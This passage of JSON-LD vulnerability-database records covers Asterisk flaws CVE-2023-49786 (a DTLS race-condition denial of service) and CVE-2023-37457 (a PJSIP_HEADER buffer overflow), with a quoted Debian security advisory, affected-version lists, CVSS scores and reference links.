        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/external_ids#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "db": "NVD",
            "id": "CVE-2023-49786",
            "trust": 2.7
          },
          {
            "db": "PACKETSTORM",
            "id": "176251",
            "trust": 1.8
          },
          {
            "db": "OPENWALL",
            "id": "OSS-SECURITY/2023/12/15/7",
            "trust": 1.8
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2023-024446",
            "trust": 0.8
          },
          {
            "db": "PACKETSTORM",
            "id": "176383",
            "trust": 0.1
          }
        ],
        "sources": [
          {
            "db": "JVNDB",
            "id": "JVNDB-2023-024446"
          },
          {
            "db": "PACKETSTORM",
            "id": "176383"
          },
          {
            "db": "NVD",
            "id": "CVE-2023-49786"
          }
        ]
      },
      "id": "VAR-202312-0487",
      "iot": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/iot#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": true,
        "sources": [
          {
            "db": "VARIoT devices database",
            "id": null
          }
        ],
        "trust": 1.0
      },
      "last_update_date": "2024-02-01T22:52:28.007000Z",
      "problemtype_data": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "problemtype": "CWE-362",
            "trust": 1.0
          },
          {
            "problemtype": "Race condition (CWE-362) [NVD evaluation ]",
            "trust": 0.8
          }
        ],
        "sources": [
          {
            "db": "JVNDB",
            "id": "JVNDB-2023-024446"
          },
          {
            "db": "NVD",
            "id": "CVE-2023-49786"
          }
        ]
      },
      "references": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/references#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "trust": 1.8,
            "url": "http://packetstormsecurity.com/files/176251/asterisk-20.1.0-denial-of-service.html"
          },
          {
            "trust": 1.8,
            "url": "http://seclists.org/fulldisclosure/2023/dec/24"
          },
          {
            "trust": 1.8,
            "url": "http://www.openwall.com/lists/oss-security/2023/12/15/7"
          },
          {
            "trust": 1.8,
            "url": "https://github.com/enablesecurity/advisories/tree/master/es2023-01-asterisk-dtls-hello-race"
          },
          {
            "trust": 1.8,
            "url": "https://github.com/asterisk/asterisk/commit/d7d7764cb07c8a1872804321302ef93bf62cba05"
          },
          {
            "trust": 1.8,
            "url": "https://github.com/asterisk/asterisk/security/advisories/ghsa-hxj9-xwr8-w8pq"
          },
          {
            "trust": 1.8,
            "url": "https://lists.debian.org/debian-lts-announce/2023/12/msg00019.html"
          },
          {
            "trust": 0.9,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2023-49786"
          },
          {
            "trust": 0.1,
            "url": "https://www.debian.org/security/"
          },
          {
            "trust": 0.1,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2023-38703"
          },
          {
            "trust": 0.1,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2023-49294"
          },
          {
            "trust": 0.1,
            "url": "https://www.debian.org/security/faq"
          },
          {
            "trust": 0.1,
            "url": "https://security-tracker.debian.org/tracker/asterisk"
          },
          {
            "trust": 0.1,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2023-37457"
          }
        ],
        "sources": [
          {
            "db": "JVNDB",
            "id": "JVNDB-2023-024446"
          },
          {
            "db": "PACKETSTORM",
            "id": "176383"
          },
          {
            "db": "NVD",
            "id": "CVE-2023-49786"
          }
        ]
      },
      "sources": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "db": "JVNDB",
            "id": "JVNDB-2023-024446"
          },
          {
            "db": "PACKETSTORM",
            "id": "176383"
          },
          {
            "db": "NVD",
            "id": "CVE-2023-49786"
          }
        ]
      },
      "sources_release_date": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "date": "2024-01-31T00:00:00",
            "db": "JVNDB",
            "id": "JVNDB-2023-024446"
          },
          {
            "date": "2024-01-05T14:31:02",
            "db": "PACKETSTORM",
            "id": "176383"
          },
          {
            "date": "2023-12-14T20:15:52.927000",
            "db": "NVD",
            "id": "CVE-2023-49786"
          }
        ]
      },
      "sources_update_date": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "date": "2024-01-31T06:13:00",
            "db": "JVNDB",
            "id": "JVNDB-2023-024446"
          },
          {
            "date": "2023-12-29T00:15:50.043000",
            "db": "NVD",
            "id": "CVE-2023-49786"
          }
        ]
      },
      "title": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/title#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "Digium\u00a0 of \u00a0Asterisk\u00a0 Vulnerabilities related to race conditions in products from multiple vendors such as",
        "sources": [
          {
            "db": "JVNDB",
            "id": "JVNDB-2023-024446"
          }
        ],
        "trust": 0.8
      }
    }

    VAR-202312-1059

    Vulnerability from variot - Updated: 2024-01-18 22:29

    Asterisk is an open source private branch exchange and telephony toolkit. In Asterisk versions 18.20.0 and prior, 20.5.0 and prior, and 21.0.0; as well as ceritifed-asterisk 18.9-cert5 and prior, the 'update' functionality of the PJSIP_HEADER dialplan function can exceed the available buffer space for storing the new value of a header. By doing so this can overwrite memory or cause a crash. This is not externally exploitable, unless dialplan is explicitly written to update a header based on data from an outside source. If the 'update' functionality is not used the vulnerability does not occur. A patch is available at commit a1ca0268254374b515fa5992f01340f7717113fa. Digium of Asterisk Classic buffer overflow vulnerabilities exist in products from multiple vendors.Information is tampered with and service operation is interrupted (DoS) It may be in a state. -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA512


    Debian Security Advisory DSA-5596-1 security@debian.org https://www.debian.org/security/ Markus Koschany January 04, 2024 https://www.debian.org/security/faq


    Package : asterisk CVE ID : CVE-2023-37457 CVE-2023-38703 CVE-2023-49294 CVE-2023-49786 Debian Bug : 1059303 1059032 1059033

    Multiple security vulnerabilities have been discovered in Asterisk, an Open Source Private Branch Exchange.

    CVE-2023-38703

    PJSIP is a free and open source multimedia communication library written in
    C with high level API in C, C++, Java, C#, and Python languages. SRTP is a
    higher level media transport which is stacked upon a lower level media
    transport such as UDP and ICE. Currently a higher level transport is not
    synchronized with its lower level transport that may introduce a
    use-after-free issue. This vulnerability affects applications that have
    SRTP capability (`PJMEDIA_HAS_SRTP` is set) and use underlying media
    transport other than UDP. This vulnerability’s impact may range from
    unexpected application termination to control flow hijack/memory
    corruption.
    

    CVE-2023-49294

    It is possible to read any arbitrary file even when the `live_dangerously`
    option is not enabled.
    

    CVE-2023-49786

    Asterisk is susceptible to a DoS due to a race condition in the hello handshake phase of the DTLS protocol when handling DTLS-SRTP for media setup. This attack can be done continuously, thus denying new DTLS-SRTP encrypted calls during the attack. Abuse of this vulnerability may lead to a massive Denial of Service on vulnerable Asterisk servers for calls that rely on DTLS-SRTP.

    For the oldstable distribution (bullseye), these problems have been fixed in version 1:16.28.0~dfsg-0+deb11u4.

    We recommend that you upgrade your asterisk packages.

    For the detailed security status of asterisk please refer to its security tracker page at: https://security-tracker.debian.org/tracker/asterisk

    Further information about Debian Security Advisories, how to apply these updates to your system and frequently asked questions can be found at: https://www.debian.org/security/

    Mailing list: debian-security-announce@lists.debian.org -----BEGIN PGP SIGNATURE-----

    iQKTBAEBCgB9FiEErPPQiO8y7e9qGoNf2a0UuVE7UeQFAmWXIDJfFIAAAAAALgAo aXNzdWVyLWZwckBub3RhdGlvbnMub3BlbnBncC5maWZ0aGhvcnNlbWFuLm5ldEFD RjNEMDg4RUYzMkVERUY2QTFBODM1RkQ5QUQxNEI5NTEzQjUxRTQACgkQ2a0UuVE7 UeRqthAA0ZarRHMpoNwTCAiVuVzcNqGVls/XvEvDbw1DNgjeKptlm4qafmVxHd6F Jtloc8zD2w0sOCZCSbATZDosXlFCkAj09aI6oSfJOLBlqRDFVNhPn1Y4a1xOgAfl AZyn458v3TqlNFcZjJ89qHHociZ+fDfMUYpMsp/v9A4AOQjKn7AKYJ7aaL5PHR8b zejn2pP/8Hv592K4+xa5h/6a0AaXX0eOTlxZDFh7x93oP+op0k4v1J7ivP+Qs4wk T5iOqs6JrMc640ZprXB3c8HjapZt4ee5+Yp7An3Z7o/r9crXqT/6ocIRPmkomXVb bhZXSfEs5BmzkdWSnOBigSWthSp9umPKWWV9wUwSe1115XxhT43J7oBix9gkNCEu mN5Po/yaZQUDEtWx1DpVZtI3TNBwyv28f2XoUy72oq0WqEvBGC8hLDMXqjVWxhRh bRXfairiS/pfx2h4eIT5xUKX7xUUCEcGpZ2hIEgGGlS8TX2le+mWa+ipKNPYrBWJ Qvg+MJ2JD9O3jMMS85y7ISuWUDNSeIDUSa0E48QWExZd8tmuknyDgPx5i4/nDVC+ sxH1LnEgbUjLLfCCF0CZgbYebiEmUqyfvOSaJ3olekrxkje2WwVY+uJ4NJXBycPU +k3Db3c/h/zoYJ9A3ZKz/xu5L32grES2FMxdBDFeF/5VloO4/dg=N8+A -----END PGP SIGNATURE-----

    Show details on source website

    {
      "@context": {
        "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
        "affected_products": {
          "@id": "https://www.variotdbs.pl/ref/affected_products"
        },
        "configurations": {
          "@id": "https://www.variotdbs.pl/ref/configurations"
        },
        "credits": {
          "@id": "https://www.variotdbs.pl/ref/credits"
        },
        "cvss": {
          "@id": "https://www.variotdbs.pl/ref/cvss/"
        },
        "description": {
          "@id": "https://www.variotdbs.pl/ref/description/"
        },
        "exploit_availability": {
          "@id": "https://www.variotdbs.pl/ref/exploit_availability/"
        },
        "external_ids": {
          "@id": "https://www.variotdbs.pl/ref/external_ids/"
        },
        "iot": {
          "@id": "https://www.variotdbs.pl/ref/iot/"
        },
        "iot_taxonomy": {
          "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
        },
        "patch": {
          "@id": "https://www.variotdbs.pl/ref/patch/"
        },
        "problemtype_data": {
          "@id": "https://www.variotdbs.pl/ref/problemtype_data/"
        },
        "references": {
          "@id": "https://www.variotdbs.pl/ref/references/"
        },
        "sources": {
          "@id": "https://www.variotdbs.pl/ref/sources/"
        },
        "sources_release_date": {
          "@id": "https://www.variotdbs.pl/ref/sources_release_date/"
        },
        "sources_update_date": {
          "@id": "https://www.variotdbs.pl/ref/sources_update_date/"
        },
        "threat_type": {
          "@id": "https://www.variotdbs.pl/ref/threat_type/"
        },
        "title": {
          "@id": "https://www.variotdbs.pl/ref/title/"
        },
        "type": {
          "@id": "https://www.variotdbs.pl/ref/type/"
        }
      },
      "@id": "https://www.variotdbs.pl/vuln/VAR-202312-1059",
      "affected_products": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/affected_products#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            },
            "@id": "https://www.variotdbs.pl/ref/sources"
          }
        },
        "data": [
          {
            "model": "asterisk",
            "scope": "gte",
            "trust": 1.0,
            "vendor": "digium",
            "version": "19.0.0"
          },
          {
            "model": "certified asterisk",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "sangoma",
            "version": "18.9"
          },
          {
            "model": "certified asterisk",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "sangoma",
            "version": "16.8.0"
          },
          {
            "model": "asterisk",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "digium",
            "version": "20.5.0"
          },
          {
            "model": "asterisk",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "digium",
            "version": "18.20.0"
          },
          {
            "model": "asterisk",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "digium",
            "version": "21.0.0"
          },
          {
            "model": "certified asterisk",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "sangoma",
            "version": "13.13.0"
          },
          {
            "model": "asterisk",
            "scope": null,
            "trust": 0.8,
            "vendor": "digium",
            "version": null
          },
          {
            "model": "certified asterisk",
            "scope": null,
            "trust": 0.8,
            "vendor": "sangoma",
            "version": null
          }
        ],
        "sources": [
          {
            "db": "JVNDB",
            "id": "JVNDB-2023-020247"
          },
          {
            "db": "NVD",
            "id": "CVE-2023-37457"
          }
        ]
      },
      "configurations": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/configurations#",
          "children": {
            "@container": "@list"
          },
          "cpe_match": {
            "@container": "@list"
          },
          "data": {
            "@container": "@list"
          },
          "nodes": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "CVE_data_version": "4.0",
            "nodes": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:a:sangoma:certified_asterisk:18.9:cert2:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  },
                  {
                    "cpe23Uri": "cpe:2.3:a:sangoma:certified_asterisk:18.9:cert1:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  },
                  {
                    "cpe23Uri": "cpe:2.3:a:sangoma:certified_asterisk:18.9:cert3:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  },
                  {
                    "cpe23Uri": "cpe:2.3:a:sangoma:certified_asterisk:18.9:cert4:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  },
                  {
                    "cpe23Uri": "cpe:2.3:a:sangoma:certified_asterisk:18.9:cert5:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  },
                  {
                    "cpe23Uri": "cpe:2.3:a:sangoma:certified_asterisk:13.13.0:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  },
                  {
                    "cpe23Uri": "cpe:2.3:a:sangoma:certified_asterisk:13.13.0:cert1:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  },
                  {
                    "cpe23Uri": "cpe:2.3:a:sangoma:certified_asterisk:13.13.0:cert1-rc1:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  },
                  {
                    "cpe23Uri": "cpe:2.3:a:sangoma:certified_asterisk:13.13.0:cert1-rc2:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  },
                  {
                    "cpe23Uri": "cpe:2.3:a:sangoma:certified_asterisk:13.13.0:cert1-rc3:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  },
                  {
                    "cpe23Uri": "cpe:2.3:a:sangoma:certified_asterisk:13.13.0:cert1-rc4:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  },
                  {
                    "cpe23Uri": "cpe:2.3:a:sangoma:certified_asterisk:13.13.0:cert2:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  },
                  {
                    "cpe23Uri": "cpe:2.3:a:sangoma:certified_asterisk:13.13.0:cert3:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  },
                  {
                    "cpe23Uri": "cpe:2.3:a:sangoma:certified_asterisk:13.13.0:rc1:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  },
                  {
                    "cpe23Uri": "cpe:2.3:a:sangoma:certified_asterisk:13.13.0:rc2:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  },
                  {
                    "cpe23Uri": "cpe:2.3:a:sangoma:certified_asterisk:16.8.0:-:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  },
                  {
                    "cpe23Uri": "cpe:2.3:a:sangoma:certified_asterisk:16.8.0:cert1:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  },
                  {
                    "cpe23Uri": "cpe:2.3:a:sangoma:certified_asterisk:16.8.0:cert10:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  },
                  {
                    "cpe23Uri": "cpe:2.3:a:sangoma:certified_asterisk:16.8.0:cert11:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  },
                  {
                    "cpe23Uri": "cpe:2.3:a:sangoma:certified_asterisk:16.8.0:cert12:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  },
                  {
                    "cpe23Uri": "cpe:2.3:a:sangoma:certified_asterisk:16.8.0:cert2:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  },
                  {
                    "cpe23Uri": "cpe:2.3:a:sangoma:certified_asterisk:16.8.0:cert3:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  },
                  {
                    "cpe23Uri": "cpe:2.3:a:sangoma:certified_asterisk:16.8.0:cert4:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  },
                  {
                    "cpe23Uri": "cpe:2.3:a:sangoma:certified_asterisk:16.8.0:cert5:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  },
                  {
                    "cpe23Uri": "cpe:2.3:a:sangoma:certified_asterisk:16.8.0:cert6:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  },
                  {
                    "cpe23Uri": "cpe:2.3:a:sangoma:certified_asterisk:16.8.0:cert7:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  },
                  {
                    "cpe23Uri": "cpe:2.3:a:sangoma:certified_asterisk:16.8.0:cert8:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  },
                  {
                    "cpe23Uri": "cpe:2.3:a:sangoma:certified_asterisk:16.8.0:cert9:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  },
                  {
                    "cpe23Uri": "cpe:2.3:a:digium:asterisk:21.0.0:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  },
                  {
                    "cpe23Uri": "cpe:2.3:a:digium:asterisk:*:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "versionEndIncluding": "20.5.0",
                    "versionStartIncluding": "19.0.0",
                    "vulnerable": true
                  },
                  {
                    "cpe23Uri": "cpe:2.3:a:digium:asterisk:*:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "versionEndIncluding": "18.20.0",
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              }
            ]
          }
        ],
        "sources": [
          {
            "db": "NVD",
            "id": "CVE-2023-37457"
          }
        ]
      },
      "credits": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/credits#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "Debian",
        "sources": [
          {
            "db": "PACKETSTORM",
            "id": "176383"
          }
        ],
        "trust": 0.1
      },
      "cve": "CVE-2023-37457",
      "cvss": {
        "@context": {
          "cvssV2": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
          },
          "cvssV3": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
          },
          "severity": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/cvss/severity#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/severity"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            },
            "@id": "https://www.variotdbs.pl/ref/sources"
          }
        },
        "data": [
          {
            "cvssV2": [],
            "cvssV3": [
              {
                "attackComplexity": "LOW",
                "attackVector": "NETWORK",
                "author": "NVD",
                "availabilityImpact": "HIGH",
                "baseScore": 8.2,
                "baseSeverity": "HIGH",
                "confidentialityImpact": "NONE",
                "exploitabilityScore": 3.9,
                "impactScore": 4.2,
                "integrityImpact": "LOW",
                "privilegesRequired": "NONE",
                "scope": "UNCHANGED",
                "trust": 1.0,
                "userInteraction": "NONE",
                "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:H",
                "version": "3.1"
              },
              {
                "attackComplexity": "LOW",
                "attackVector": "NETWORK",
                "author": "security-advisories@github.com",
                "availabilityImpact": "HIGH",
                "baseScore": 7.5,
                "baseSeverity": "HIGH",
                "confidentialityImpact": "NONE",
                "exploitabilityScore": 3.9,
                "impactScore": 3.6,
                "integrityImpact": "NONE",
                "privilegesRequired": "NONE",
                "scope": "UNCHANGED",
                "trust": 1.0,
                "userInteraction": "NONE",
                "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
                "version": "3.1"
              },
              {
                "attackComplexity": "Low",
                "attackVector": "Network",
                "author": "NVD",
                "availabilityImpact": "High",
                "baseScore": 8.2,
                "baseSeverity": "High",
                "confidentialityImpact": "None",
                "exploitabilityScore": null,
                "id": "CVE-2023-37457",
                "impactScore": null,
                "integrityImpact": "Low",
                "privilegesRequired": "None",
                "scope": "Unchanged",
                "trust": 0.8,
                "userInteraction": "None",
                "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:H",
                "version": "3.0"
              }
            ],
            "severity": [
              {
                "author": "NVD",
                "id": "CVE-2023-37457",
                "trust": 1.8,
                "value": "HIGH"
              },
              {
                "author": "security-advisories@github.com",
                "id": "CVE-2023-37457",
                "trust": 1.0,
                "value": "HIGH"
              }
            ]
          }
        ],
        "sources": [
          {
            "db": "JVNDB",
            "id": "JVNDB-2023-020247"
          },
          {
            "db": "NVD",
            "id": "CVE-2023-37457"
          },
          {
            "db": "NVD",
            "id": "CVE-2023-37457"
          }
        ]
      },
      "description": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/description#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "Asterisk is an open source private branch exchange and telephony toolkit. In Asterisk versions 18.20.0 and prior, 20.5.0 and prior, and 21.0.0; as well as ceritifed-asterisk 18.9-cert5 and prior, the \u0027update\u0027 functionality of the PJSIP_HEADER dialplan function can exceed the available buffer space for storing the new value of a header. By doing so this can overwrite memory or cause a crash. This is not externally exploitable, unless dialplan is explicitly written to update a header based on data from an outside source. If the \u0027update\u0027 functionality is not used the vulnerability does not occur. A patch is available at commit a1ca0268254374b515fa5992f01340f7717113fa. Digium of Asterisk Classic buffer overflow vulnerabilities exist in products from multiple vendors.Information is tampered with and service operation is interrupted (DoS) It may be in a state. -----BEGIN PGP SIGNED MESSAGE-----\nHash: SHA512\n\n- -------------------------------------------------------------------------\nDebian Security Advisory DSA-5596-1                   security@debian.org\nhttps://www.debian.org/security/                          Markus Koschany\nJanuary 04, 2024                      https://www.debian.org/security/faq\n- -------------------------------------------------------------------------\n\nPackage        : asterisk\nCVE ID         : CVE-2023-37457 CVE-2023-38703 CVE-2023-49294 CVE-2023-49786\nDebian Bug     : 1059303 1059032 1059033\n\nMultiple security vulnerabilities have been discovered in Asterisk, an Open\nSource Private Branch Exchange. \n\nCVE-2023-38703\n\n    PJSIP is a free and open source multimedia communication library written in\n    C with high level API in C, C++, Java, C#, and Python languages. SRTP is a\n    higher level media transport which is stacked upon a lower level media\n    transport such as UDP and ICE. Currently a higher level transport is not\n    synchronized with its lower level transport that may introduce a\n    use-after-free issue. This vulnerability affects applications that have\n    SRTP capability (`PJMEDIA_HAS_SRTP` is set) and use underlying media\n    transport other than UDP. This vulnerability\u2019s impact may range from\n    unexpected application termination to control flow hijack/memory\n    corruption. \n\nCVE-2023-49294\n\n    It is possible to read any arbitrary file even when the `live_dangerously`\n    option is not enabled. \n\nCVE-2023-49786\n\n   Asterisk is susceptible to a DoS due to a race condition in the hello\n   handshake phase of the DTLS protocol when handling DTLS-SRTP for media\n   setup. This attack can be done continuously, thus denying new DTLS-SRTP\n   encrypted calls during the attack. Abuse of this vulnerability may lead to\n   a massive Denial of Service on vulnerable Asterisk servers for calls that\n   rely on DTLS-SRTP. \n\n\nFor the oldstable distribution (bullseye), these problems have been fixed\nin version 1:16.28.0~dfsg-0+deb11u4. \n\nWe recommend that you upgrade your asterisk packages. \n\nFor the detailed security status of asterisk please refer to\nits security tracker page at:\nhttps://security-tracker.debian.org/tracker/asterisk\n\nFurther information about Debian Security Advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: https://www.debian.org/security/\n\nMailing list: debian-security-announce@lists.debian.org\n-----BEGIN PGP SIGNATURE-----\n\niQKTBAEBCgB9FiEErPPQiO8y7e9qGoNf2a0UuVE7UeQFAmWXIDJfFIAAAAAALgAo\naXNzdWVyLWZwckBub3RhdGlvbnMub3BlbnBncC5maWZ0aGhvcnNlbWFuLm5ldEFD\nRjNEMDg4RUYzMkVERUY2QTFBODM1RkQ5QUQxNEI5NTEzQjUxRTQACgkQ2a0UuVE7\nUeRqthAA0ZarRHMpoNwTCAiVuVzcNqGVls/XvEvDbw1DNgjeKptlm4qafmVxHd6F\nJtloc8zD2w0sOCZCSbATZDosXlFCkAj09aI6oSfJOLBlqRDFVNhPn1Y4a1xOgAfl\nAZyn458v3TqlNFcZjJ89qHHociZ+fDfMUYpMsp/v9A4AOQjKn7AKYJ7aaL5PHR8b\nzejn2pP/8Hv592K4+xa5h/6a0AaXX0eOTlxZDFh7x93oP+op0k4v1J7ivP+Qs4wk\nT5iOqs6JrMc640ZprXB3c8HjapZt4ee5+Yp7An3Z7o/r9crXqT/6ocIRPmkomXVb\nbhZXSfEs5BmzkdWSnOBigSWthSp9umPKWWV9wUwSe1115XxhT43J7oBix9gkNCEu\nmN5Po/yaZQUDEtWx1DpVZtI3TNBwyv28f2XoUy72oq0WqEvBGC8hLDMXqjVWxhRh\nbRXfairiS/pfx2h4eIT5xUKX7xUUCEcGpZ2hIEgGGlS8TX2le+mWa+ipKNPYrBWJ\nQvg+MJ2JD9O3jMMS85y7ISuWUDNSeIDUSa0E48QWExZd8tmuknyDgPx5i4/nDVC+\nsxH1LnEgbUjLLfCCF0CZgbYebiEmUqyfvOSaJ3olekrxkje2WwVY+uJ4NJXBycPU\n+k3Db3c/h/zoYJ9A3ZKz/xu5L32grES2FMxdBDFeF/5VloO4/dg=N8+A\n-----END PGP SIGNATURE-----\n",
        "sources": [
          {
            "db": "NVD",
            "id": "CVE-2023-37457"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2023-020247"
          },
          {
            "db": "PACKETSTORM",
            "id": "176383"
          }
        ],
        "trust": 1.71
      },
      "external_ids": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/external_ids#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "db": "NVD",
            "id": "CVE-2023-37457",
            "trust": 2.7
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2023-020247",
            "trust": 0.8
          },
          {
            "db": "PACKETSTORM",
            "id": "176383",
            "trust": 0.1
          }
        ],
        "sources": [
          {
            "db": "JVNDB",
            "id": "JVNDB-2023-020247"
          },
          {
            "db": "PACKETSTORM",
            "id": "176383"
          },
          {
            "db": "NVD",
            "id": "CVE-2023-37457"
          }
        ]
      },
      "id": "VAR-202312-1059",
      "iot": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/iot#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": true,
        "sources": [
          {
            "db": "VARIoT devices database",
            "id": null
          }
        ],
        "trust": 1.0
      },
      "last_update_date": "2024-01-18T22:29:19.418000Z",
      "problemtype_data": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "problemtype": "CWE-120",
            "trust": 1.0
          },
          {
            "problemtype": "Classic buffer overflow (CWE-120) [NVD evaluation ]",
            "trust": 0.8
          }
        ],
        "sources": [
          {
            "db": "JVNDB",
            "id": "JVNDB-2023-020247"
          },
          {
            "db": "NVD",
            "id": "CVE-2023-37457"
          }
        ]
      },
      "references": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/references#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "trust": 1.8,
            "url": "https://github.com/asterisk/asterisk/commit/a1ca0268254374b515fa5992f01340f7717113fa"
          },
          {
            "trust": 1.8,
            "url": "https://github.com/asterisk/asterisk/security/advisories/ghsa-98rc-4j27-74hh"
          },
          {
            "trust": 1.8,
            "url": "https://lists.debian.org/debian-lts-announce/2023/12/msg00019.html"
          },
          {
            "trust": 0.9,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2023-37457"
          },
          {
            "trust": 0.1,
            "url": "https://www.debian.org/security/"
          },
          {
            "trust": 0.1,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2023-38703"
          },
          {
            "trust": 0.1,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2023-49294"
          },
          {
            "trust": 0.1,
